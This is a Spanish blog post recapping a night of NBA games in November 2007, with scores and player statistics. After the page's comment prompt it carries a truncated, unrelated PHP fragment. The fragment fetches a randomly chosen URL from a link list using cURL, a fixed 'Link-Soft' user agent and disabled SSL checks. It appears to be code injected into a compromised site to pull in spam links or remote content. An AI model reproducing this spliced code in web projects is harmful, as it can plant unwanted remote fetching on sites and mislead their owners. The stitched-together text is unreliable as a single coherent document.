La crónica (noche del 4/11/07)

05 de November de 2007 por MagicJohnson32

jfarmarRay Allen, al rescate de los Celtics; Nash, al rescate de los Suns; el coladero de los Sonics;  el banquillo de los Pistons; los problemas de los Heat sin Wade; el difícil año I d.G. para los Wolves; la irregular noche de West; y el sorprendente aliado de Bryant ante los Jazz; todo ello y más en nuestra crónica de los partidos disputados la pasada madrugada en la NBA.

celticswinCeltics 98 – Raptors 95

Pick your poison. Estos nuevos Celtics dejan elegir a los rivales quién será su verdugo. Anoche los Raptors eligieron a Ray Allen, que anotó un triple a menos de tres segundos para el final de la prórroga después de que T.J. Ford hubiese empatado el partido en la posesión anterior. Allen, con 33 puntos (11 de 16 en tiros, 7 de 11 en triples) lideró esta vez a los Celtics junto a Garnett (23-13-6). Ford logró 32 puntos pero sólo Bosh (19-10) y Kapono alcanzaron la decena. Los malos partidos de Calderón y Garbajosa estuvieron en la línea del resto del banquillo de Mitchell.

Sonics 101 – Clippers 115

Los Sonics tienen un problema; se llama “defensa”. En los tres partidos disputados hasta la fecha, tres derrotas, elsonicsclipps equipo de Washington ha encajado una media de más de 113 puntos. Anoche los Clippers se fueron hasta los 115 de la mano de la pareja Maggette-Tim Thomas, autores de 47 puntos. De nada sirvió el mejor partido de Durant, 24 puntos con 10 de 19, más 8 rebotes y 5 asistencias, ni los 22 puntos, 5 rebotes y 6 asistencias de Wilkins. Los Sonics cedieron 37 puntos en el último cuarto y perdieron así todas las opciones de lograr la que habría sido su primera victoria de la regular season. Clippers, por su parte, suma dos victorias y por ahora no echa en falta a Elton Brand.

Wolves 93 – Knicks 97

La vida sin Garnett es dura. Los Wolves encajaron anoche la segunda derrota en esta Temporada I d.G. (después de Garnett) ante los Knicks, que estuvieron liderados por Crawford. 10 puntos en el último cuarto del ex-Bulls dieron el triunfo a los neoyorquinos en un Madison lleno que recibió con división de opiniones de Isiah Thoma. Zach Randolph, Curry, Lee, Marbury y Nate Robinson anotaron 10 puntos o más, mientras que Al Jefferson y Ryan Gomes fueron los mejores visitantes.

Bobcats 90 – Heat 88

heatbenchSi Udonis Haslem es tu mejor jugador, sucede que pierdes. El American Airlines Arena vio anoche la tercera derrota en tres partidos de los Heat, que siguen sin poder contar con Wade. Shaq, que se había quejado por recibir pocos balones, tampoco tuvo mucho protagonismo (17 puntos en 11 tiros, 9 rebotes) y ni Jason Williams, ni Ricky Davis ni Dorrell Wright firmaron su mejor noche. Sí brilló Jason Richardson, autor de 29 puntos con 6 triples, mientras que Felton hizo 19-4-7 y Okafor sumó 16 puntos y 13 rebotes para los Bobcats (2-0).

Hawks 91 – Pistons 92

Jason Maxiell y Jarvis Hayes salvaron la papeleta para los Pistons ante Atlanta con un gran último cuarto de ambos que sirvió para compensar la discreta actuación de tres titulares (Prince, Rasheed y McDyess). Billups y Hamilton anotaron 22 y 21 puntos respectivamente, mientras que Joe Johnson y Marvin Williams lograron 23 y 22. Los Pistons suman sus partidos por victorias (3-0) pero necesitarán mejorar cuando lleguen rivales de mayor entidad.

Hornets 93 – Nuggets 88

Lo que parecía una noche negra para David West terminó con el joven PF como héroe. West falló sus primeros ochohornetsdenver lanzamientos pero se recuperó para finalizar con 17 puntos y 13 rebotes y anotar dos canastas decisivas que evitaron la remontada de los locales. Destacó la lucha interior entre Chandler (12 puntos, 17 rebotes y 2 tapones) y Camby (8 puntos, 21 rebotes y 2 tapones). Iverson y Melo lograron 23 y 20 puntos pero con malos porcentajes, aunque peor aún fueron los registros de Stojakovic: 1 de 10 en tiros. Chris Paul se acercó al triple-doble con 15-8-11 para unos Hornets invictos que tuvieron a 6 hombres por encima de la decena de puntos.

Cavs 92 – Suns 103

Sin Amaré y con su equipo 12 abajo, Nash hubo de tomar las riendas de la situación. El resultado: 30 puntos y 10 asistencias del canadiense para superar a los Cavaliers pese al espectacular rendimiento del trío LeBron-Ilgauskas-Gooden (71 puntos y 32 rebotes sumaron). Sin embargo, el resto de los Cavs sólo aporto 21 puntos, mientras que Marion, Diaw y Barbosa acompañaron a Nash en ausencia de Stoudamire, que es day-to-day.

Jazz 109 – Lakers 119

Nueva victoria de prestigio para los Lakers. Tras un contundente triunfo en Phoenix, los de Phil Jackson vencieron anoche a los Jazz en el Staples en un gran encuentro decidido gracias al espectacular último cuarto de Bryant, Bynum y Farmar, autores de 28 de los 38 puntos anotados por su equipo en dicho periodo. Hasta entonces el partido resultó muy igualado, con los Jazz aferrándose a los lanzamientos exteriores de Deron y el oportunismo de Boozer cerca del aro. Pero cuando a la gran noche de Kobe, autor de 33 puntos con 13 de 19 en tiros, se le unieron los dos jóvenes jugadores, Lakers rompió el partido y acabó sentenciando con un Fisher muy acertado desde la línea de tiros libres. La jugada de la noche fue un impresionante tapón de Bryant a Kirilenko a 6 minutos para el final y en pleno estirón de los locales.

kobeakblock

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>